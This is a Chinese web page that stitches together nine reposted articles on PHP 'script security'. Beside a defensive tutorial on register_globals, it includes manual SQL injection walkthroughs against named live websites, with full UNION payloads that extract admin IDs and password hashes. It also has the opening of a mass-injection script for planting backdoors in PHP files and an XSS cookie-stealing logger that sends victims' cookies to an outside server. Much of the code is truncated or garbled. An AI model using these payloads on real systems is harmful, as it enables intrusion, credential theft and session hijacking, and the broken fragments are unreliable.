下面是小编为大家整理的用PHP 4.2书写安全的脚本PHP,本文共9篇,仅供参考,大家一起来看看吧。本文原稿由网友“Ole在逃白玉卷”提供。
篇1:用PHP 4.2书写安全的脚本PHP
在很长一段时间内,PHP作为 服务器 端 脚本语言 的最大卖点之一就是会为从表单提交的值自动建立一个全局变量,在PHP 4.1中,PHP的制作者们推荐了一个访问提交数据的替代手段。在PHP 4.2中,他们取消了那种老的做法!正如我将在这篇文章中解释的那样,作出这
在很长一段时间内,PHP作为服务器端脚本语言的最大卖点之一就是会为从表单提交的值自动建立一个全局变量。在PHP 4.1中,PHP的制作者们推荐了一个访问提交数据的替代手段。在PHP 4.2中,他们取消了那种老的做法!正如我将在这篇文章中解释的那样,作出这样的变化的目的是出于安全性的考虑。我们将研究PHP在处理表单提交及其它数据时的新的做法,并说明为什么这样做会提高代码的安全性。
这里有什么错误?
看看下面的这段PHP脚本,它用来在输入的用户名及口令正确时授权访问一个Web页面:
php>
// 检查用户名及口令
if ($username == 'kevin' and $password == 'secret')
$authorized = true;
?>
Please enter your username and password:
Username:
Password:
OK,我相信大约半数的读者会不屑的说“太愚蠢了-- 我不会犯这样的错误的!”但是我保证有很多的读者会想“嗨,没什么问题啊,我也会这么写的!”当然还会有少数人会对这个问题感到困惑(“什么是PHP?”)。PHP被设计为一个“好的而且容易的”脚本语言,初学者可以在很短的时间内学会使用它;它也应该能够避免初学者犯上面的错误。再回到刚才的问题,上面的代码中存在的问题是你可以很容易地获得访问的权力,而不需要提供正确的用户名和口令。只在要你的浏览器的地址栏的最后添加?authorized=1。因为PHP会自动地为每一个提交的值创建一个变量 -- 不论是来自动一个提交的表单、URL查询字符串还是一个cookie -- 这会将$authorized设置为1,这样一个未授权的用户也可以突破安全限制。
那么,怎么简单地解决这个问题呢?只要在程序的开头将$authorized默认设置为false。这个问题就不存在了!$authorized是一个完全在程序代码中创建的变量;但是为什么开发者得为每一个恶意的用户提交的变量担心呢?
PHP 4.2作了什么改变?
在PHP 4.2中,新安装的PHP中的register_globals选项默认为关闭,因此EGPCS值(EGPCS是Environment、Get、Post、Cookies、Server的缩写 -- 这是PHP中外部变量来源的全部范围)不会被作为全局变量来创建。当然,这个选项还可以通过手工来开启,但是PHP的开发者推荐你将其关闭。要贯彻他们的意图,你需要使用其它的方法来获取这些值。
从PHP 4.1开始,EGPCS值就可以从一组指定的数组中获得:
$_ENV -- 包含系统环境变量
$_GET -- 包含查询字符串中的变量,以及提交方法为GET的表单中的变量
$_POST -- 包含提交方式为POST的表单中的变量
$_COOKIE -- 包含所有cookie变量
$_SERVER -- 包含服务器变量,例如HTTP_USER_AGENT
$_REQUEST -- 包含$_GET、$_POST和$_COOKIE的全部内容
$_SESSION -- 包含所有已注册的session变量
在PHP 4.1之前,当开发者关闭register_globals选项(这也被考虑为提高PHP性能的一种方法)后,必须使用诸如$HTTP_GET_VARS这样的令人讨厌的名字来获取这些变量。这些新的变量名不仅仅短,而且它们还有其他优点。首先,让我们在PHP 4.2中(也就是说关闭register_globals 选项)重写上面提到的代码:
$username = $_REQUEST['username'];
$password = $_REQUEST['password'];
// 检查用户名和口令
if ($username == 'kevin' and $password == 'secret')
$authorized = true;
?>
Please enter your username and password:
Username:
Password:
正如你看到的,我所需要做的只是在代码的开始增加下面两行:$username = $_REQUEST['username'];
$password = $_REQUEST['password'];
因为我们希望用户名和密码是由用户提交的,所以我们从$_REQUEST数组中获取这些值。使用这个数组使得用户可以自由选择传递方式:通过URL查询字符串(例如允许用户创建书签时自动输入他们的证书)、通过一个提交的表单或者是通过一个cookie。如果你想要限制只能通过表单提交证书(更精确地说,是通过HTTP POST请求),你可以使用$_POST数组:
$username = $_POST['username'];
$password = $_POST['password'];
除了“引入”这两个变量以外,程序代码没有任何改变。简单地关闭register_globals选项促使开发者更进一步了解哪些数据是来自外部的(不可信任的)资源。
请注意这里还有一个小问题:PHP中默认的error_reporting设置仍然是E_ALL & ~E_NOTICE,因此如果“username”和“password”这两个值没有被提交,试图从$_REQUEST数组或$_POST数组中获得这两个值并不会招致任何错误信息。如晨不你的PHP程序需要严格的错误检查,你还需要增加一些代码以首先检查这些变量。
但是这是不是意味着更多的输入?
是的,在象上面这样的简单程序中,使用PHP 4.2常常会增加输入量,
但是,还是看看光明的一面吧 -- 你的程序终究是更安全了!
不过认真的说,PHP的设计者并没有完全忽视你的痛苦。在这些新数组中有一个特殊的其它所PHP变量都不具备的特征,它们是完全的全局变量。这对你有什么帮助呢?让我们先对我们的示例进行一下扩充。
为了使得站点中的多个页面可以使用用户名/口令论证,我们将我们用户认证程序写到一个include文件(protectme.php)中:
/* protectme.php */
function authorize_user($authuser, $authpass)
{
$username = $_POST['username'];
$password = $_POST['password'];
// 检查用户名和口令
if ($username != $authuser or $password != $authpass):
?>
Please enter your username and password:
Username:
Password:
exit;
endif;
}
?>
现在,我们刚才的页面看上去将是这样的:require('protectme.php');
authorize_user('kevin','secret');
?>
很简单,很清晰明了,对不对?现在是考验你的眼力和经验的时候了 -- 在authorize_user 函数中少了什么?在函数中没有申明$_POST是一个全局变量!在php 4.0中,当register_globals开启时,你需要增加一行代码以在函数中获取$username和$password变量:
function authorize_user($authuser, $authpass)
{
global $username, $password;
...
在PHP中,和其它具有类似语法的语言不同,函数外的变量在函数中不能自动获得,你需要象上面所说明的那样增加一行以指定其来自global范围。
在PHP 4.0中,当关闭register_globals以提供安全性时,你可以使用$HTTP_POST_VARS数组以获得你的表单提交的值,但是你还是需要从全局范围导入这个数组:
function authorize_user($authuser, $authpass)
{
global $HTTP_POST_VARS;
$username = $HTTP_POST_VARS['username'];
$password = $HTTP_POST_VARS['password'];
但是在PHP 4.1及以后的版本中,特殊的$_POST变量(以及上面提到的其它变量)可以在所有范围内使用。这就是不需要在函数中申明$_POST变量是一个全局变量的原因:function authorize_user($authuser, $authpass)
{
$username = $_POST['username'];
$password = $_POST['password'];
这对session有什么影响?
特殊的$_SESSION数组的引入实际上有助于简化session代码。你不需要将session变量申明为全局变量,然后再去留意哪些变量被注册了,你现在可以简单地从$_SESSION['varname']中引用你所有的session变量。
现在让我们来看看另一个用户认证的例子。这一次,我们使用sessions以标志一个在你的网站继续逗留的用户已经经过了用户认证。首先,我们来看看PHP 4.0版本(开启register_globals):
session_start();
if ($username == 'kevin' and $password == 'secret')
{
$authorized = true;
session_register('authorized');
}
?>
和刚开始的程序一样,这个程序也存在安全漏洞,在URL的最后加上?authorized=1可以绕过安全措施直接访问页面内容。开发者可以将$authorized视为一个session变量而忽视了可以很容易地通过用户输入设置同样的变量。当我们增加了我们的特殊的数组(PHP 4.1)并关闭register_globals(PHP 4.2)后,我们的程序将是这样的:
session_start();
if ($username == 'kevin' and $password == 'secret')
$_SESSION['authorized'] = true;
?>
是不是更加简单了?你不再需要再将普通的变量注册为一个session变量,你只需要直接设置session变量(在$_SESSION数组中),然后用同样的方法使用它。程序变得更短了,而且对于什么变量是session变量也不会引起混乱!总结
在这篇文章中,我解释了PHP脚本语言作出改变的深层原因。在PHP 4.1中,添加了一组特殊数据以访问外部数据。这些数组可以在任何范围内调用,这使得外部数据的访问更方便。在PHP 4.2中,register_globals被默认关闭以鼓励使用这些数组以避免无经验的开发者编写出不安全的PHP代码。
原文转自:www.ltesting.net
篇2:用php42书写安全的脚本
用PHP 4.2书写安全的脚本
:Andy.m 日期:-06-06 人气:19
在很长一段时间内,PHP作为服务器端脚本语言的最大卖点之一就是会为从表单提交的值自动建立一个全局变量,在PHP 4.1中,PHP的制作者们推荐了一个访问提交数据的替代手段。在PHP 4.2中,他们取消了那种老的做法!正如我将在这篇文章中解释的那样,作出这样的变化的目的是出于安全性的考虑。我们将研究PHP在处理表单提交及其它数据时的新的做法,并说明为什么这样做会提高代码的安全性。
这里有什么错误?
看看下面的这段PHP脚本,它用来在输入的用户名及口令正确时授权访问一个Web页面:
// 检查用户名及口令
if($username=='kevin'and$password=='secret')
$authorized=true;
?>
Please enter your username and password:
“ method=”POST“>Username:
Password:
OK,我相信大约半数的读者会不屑的说“太愚蠢了-- 我不会犯这样的错误的!”但是我保证有很多的读者会想“嗨,没什么问题啊,我也会这么写的!”当然还会有少数人会对这个问题感到困惑(“什么是PHP?”),
PHP被设计为一个“好的而且容易的”脚本语言,初学者可以在很短的时间内学会使用它;它也应该能够避免初学者犯上面的错误。
再回到刚才的问题,上面的代码中存在的问题是你可以很容易地获得访问的权力,而不需要提供正确的用户名和口令。只在要你的浏览器的地址栏的最后添加?authorized=1。因为PHP会自动地为每一个提交的值创建一个变量 -- 不论是来自动一个提交的表单、URL查询字符串还
篇3:vbs调用php脚本安全
php有很多强大的函数,特别是数组函数是很多vbs没有的,如果直接调用就省事多了,我只想到一个粗糙的方法调用,期待高手有更好的办法。
Set ws = CreateObject(”WScript.Shell“)
Set oExec = ws.Exec(”D:\\PC_webserver\\php\\php.exe D:\\PC_webserver\\php\\1.php“)
arraystr= oExec.StdOut.Readall
wsh.echo arraystr
篇4:用Union语句构造注入PHP脚本安全
此文章技术含量不高,。 给菜鸟学习还是很有必要滴~~ 高手看过不要仍砖头就好 ^_^
全文
原文地址: www.tkbbs.com/Article/wlaq/hkgf/10/856.html
参考文章 用Union进行高效注入
事件起因是用 HDSI过程当中 的WEBSHELL管理 有一个网站 显示是 SQL 注入 于是感兴趣的那工具扫 当然 无法 扫到管理帐号 工具无效。。 哈哈 于是开始手工注射
注射地址为 :www.XXX.net/read.php?type=news&id=29
www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7/**/from/**/admin
上面的字符的意思是 查询 ADMIN表的字段数目 可以逐个增加 最终页面 不在提示出错 可以看到 页面出现了 2 4 和作者后面的3
说明程序调用了这几个字符 如图1
于是把上面的 2 3 4 分别替换成 count(id):查询有几个管理人员 min(id):管理人员帐号ID最小值 max(id):管理人员帐号ID最大值
成为下面的语句
www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,count(id),min(id),max
(id),5,6,7/**/from/**/admin
如图2
上面的 原来的 2的地方 显示 2 4的地方显示2 3的地方显示1 说明 管理人员ID最大的为2 ID最小的为1 总共两个管理人员
下面查询 他的管理ID叫什么 密码和 ID
username password id
把上面的 2 3 4 分别替换成username password id 这个过程如果没爆出来 可以把 这几个字段换成其他的尝试
www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,username,password,1,5,6,7/**/from/**/admin
或 www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,username,password,2,5,6,7/**/from/**/admin
如图3
看见了吗 管理者 ID 为1 帐号为 wnjy 密码是 $1$BX$/.kw1RvBf/Un7c9heGMPb0
好了 本文到此就结束了 希望广大菜鸟朋友们有所领悟 另外 动力系统的 3.51前 好象也有这种漏洞 构造语句的方法大致相同~ BY 风雪残士
篇5:PHP批量挂马脚本脚本安全
批量写入档案脚本...
可以拿来挂马
也能拿来当RFI的后门注入
code都写明的,有需要的请自己看
后门写在$inj里面,要做base64 encode的Polymorphic
不希望这个东西被搞破坏的人拿去玩
懂原理的就自个儿收下吧
*******************************************************************
set_time_limit(0);
ignore_user_abort(1);
# PHP Mass Injection Script. by f3v3r ver.228
# |1| Look for PHP in directory.|2| Check injected.
# |3| Inject script. |4|Can email report to you.
$inj ='';
$log_email = 0;//change 1 enable, somehow they can trace you by this way.
$email = 'f3v3r@cc.cc';
$log_report = 1;
$filename = '__log.html';
$delete_me = 1;
echo 'f3v3r injection toolzDefacez aint hack, r00tz r.
';
$dir = opendir('.');
$site=(isset(
*******************************************************************
篇6:和我一起学PHP手工注入脚本安全
作者:冰的原点[L.S.T]
看了这么多的ASP注入的,各位是不是已经厌倦了ASP方面的注入呢?呵呵,千万不能厌倦呀,只有不断的学习,才不会被别人甩很远的!那么今天就跟着我一起学习下PHP环境下的手工注入吧.
今天的网站是一韩国的站点,注入点我已经找到了,大家如果怕麻烦的话,可以用啊D找下注入点,其实啊D不仅能找出ASP环境下的注入点,而且PHP,ASPX以及JSP的都可以找出来的哦,截张图大家看下,如图1.
其实找注入点这种事对啊D来说还是很容易的,不过接下来的事就得靠我们自己的双手来进行了.回到正文上,我们首先要判断下数据库是不是使用的mysql,在注入点处输入/*,如果正常返回的话就说明是mysql的了,因为mysql数据是支持/*的注释的,如图2,返回正确页面,然后我们得判断下mysql的版本,如果支持union查询就好办多了,我们在注入点处输入如下语句:and ord(mid(version,1,1))>51/*,返回正常,如图3..说明数据库版本是大于4.0的,也就是说支持union查询的.到这里我们最好先判断下权限,如果是root的话后面的提权就好办多了,我们提交:ord(mid(user(),1,1))=114/*,返回错误,说明不是root的权限,只能老老实实的猜表啦.好,接下来猜它的字段数,利用order by 后面加数字的方法能够很快猜出字段数,例如我提交:www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 10,返回正常,说明字段数大于10的,如图4,继续猜,然后提交www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 20,返回错误,如图5,说明字段数小于20,接下来就是苦力活了,当我们提交www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 17正常,而www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 18时错误,说明字段数就是17了,接下来就得猜列名了咯,我们提交:www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*如图6.在网页中显示出的数字中替换成我们的语句,我们继续提交,www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15,16,17/*,如图7,出现了版本号和当然数据库用户名了,接下来当然是猜表啦,首先我们想到的当然是admin这个表啦,继续提交:www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15,16,17%20from%20admin/*返回正常,说明存在admin这个表的,接下来就是最关键的地方了,我们得猜下用户名和密码的,提交:www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),username,8,9,10,11,12,13,14,15,16,17%20from%20admin/*返回错误,看来不存在username这个列名,接下来就是漫长的猜解过程啦,可是始终没有猜到用户名,不过倒是把ID和密码猜出来的,我提交的语句是这样的:www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),id,passwd,9,10,11,12,13,14,15,16,17%20from%20admin/*,呵呵,暴出来了,如图8文章到这里就要结束了,其实在乎只是这个过程而已,没有暴出用户名,而且后面的后台也没有找到,所以就只能放一放啦!不过,希望各位叉子能从本文学点东西的话,本文就会有它的价值了!
篇7:关于php注入中的magicquotesgpc脚本安全
BY:Hans
magic_quotes_gpc = on
大家都知道php配置文件php.in ,如果里面的magic_quotes_gpc 配置被打开 那就是magic_quotes_gpc = on 懂点php的人都知道,
那我们就要对数值型的字段注入。
if ( isset($_POST[”f_login“] ) )
{
//连接数据库
$t_strUid = $_POST[”f_uid“];
$t_strPwd = $_POST[”f_pwd“];
$t_strSQL = ”SELECT * FROM tbl_users WHERE uid=$t_strUid AND password = '$t_strPwd' LIMIT 0,1“;
if ( $t_hRes = mysql_query($t_strSQL) )
{
// 成功查询
}
}
?>
sample test
User ID:
Password:
上面这个代码是要我们输入username 和password 登入,有些代码省略了,
如果正确输入:
select * from tbltable_users WHERE userid=admin AND password = 'admin' LIMIT 0,1
如果攻击者在username处,输入:admin OR 1 =1 #,则注入的sql语句如下:
SELECT * FROM table_users WHERE userid=admin OR 1 =1 # AND password = 'admin' LIMIT 0,1
下面就可以进行注入了.
在php.ini 中把display_errors 选项设为display_errors = off 这样就可以防止.
篇8:总结PHP的引号和反斜杠问题脚本安全
来源:bo-blog
1. magic_quotes_gpc=on:
\\ =>\\\\
' =>\\'
” =>\\“
2. 当 \\' 、\\” 插入数据库时,字符并没有变化,仍然为 ' 和 “ ,因此读出时无需再次stripslashes。
例外:magic_quotes_runtime=on时。
3. preg_replace的pattern中使用 /e 修正符,则replacement传递到callback函数中的情形为:
\\ =>\\
' =>'
” =>\\“
4. 从数据库中读取,当magic_quotes_runtime=off时,似乎 \\ =>空 ?
总结:引号和反斜杠的问题很复杂,而且因各服务器的设置不同而千变万化,
现在我的解决方法是
\\ =>& #92;
引号则用 htmlspecialchars ,quote_style设置为 ENT_QUOTES。
希望SP1版本中贴代码的问题能够解决。
测试:
error_reporting(E_ALL);
/* 加入重定向以得到标准错误输出 stderr。 */
$handle = popen('/path/to/spooge 2>&1', 'r');
echo ”'$handle'; “ . gettype($handle) . ”\\n“;
$read = fread($handle, 2096);
echo $read;
pclose($handle);
?>
篇9:XSS获取cookie和利用方式 (PHP版)脚本安全
$cookie = $_GET['cookie']; //以GET方式获取cookie变量值$ip = getenv ('REMOTE_ADDR'); //远程主机IP地址$time=date('Y-m-d g:i:s'); //以“年-月-日时:分:秒”的格式显示时间$referer=getenv ('HTTP_REFERER'); //链接来源$agent = $_SERVER['HTTP_USER_AGENT']; //用户浏览器类型$fp = fopen('cookie.txt', 'a'); //打开cookie.txt,若不存在则创建它fwrite($fp,” IP: “ .$ip. ”n Date and Time: “ .$time. ”n User Agent:“.$agent.”n Referer: “.$referer.”n Cookie: “.$cookie.”nnn“); //写入文件fclose($fp); //关闭文件header(”Location: www.baidu.com\"); //将网页重定向到百度,增强隐蔽性
将上述文件保存为cookie.php文件,放到你自己的网站服务器下,比如这里我们自己搭建的服务器为:www.cto365.com/cookie.php,
XSS构造语句为:
或者
将上述语句写入存在XSS的目标中(最好是存储型xss),比如你找到了某个博客或者论坛存在存储型XSS,你在里面发一篇帖子或者留上你的评论,内容就是上述语句,当其他用户或者管理员打开这个评论或者帖子链接后,XSS就会触发,然后跳转到www.cto365.com/cookie.php?msg=’+document.cookie的页面,之后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。
HOW TO GET PHPCMS WEBSHELL脚本安全
- 用美丽书写人生作文400字2022-12-11
- 我用色彩书写人生作文2024-07-01
- 寻找最短的跨站代码脚本安全2022-12-11
- thinkphp框架下mysql注入脚本安全2023-07-19
- python字符串处理常用技巧脚本安全2022-12-14
- 安全宣传用的口号2022-12-11
- XSS(跨站脚本攻击) 逃避过滤脚本安全2025-03-16
- 某网站安全检测之数据库手工注入脚本安全2023-05-31
- 活着,就是用生命书写自己的故事随笔散文2023-01-22
- 用爱诠释生命用勤书写人生师德师风演讲稿2023-09-21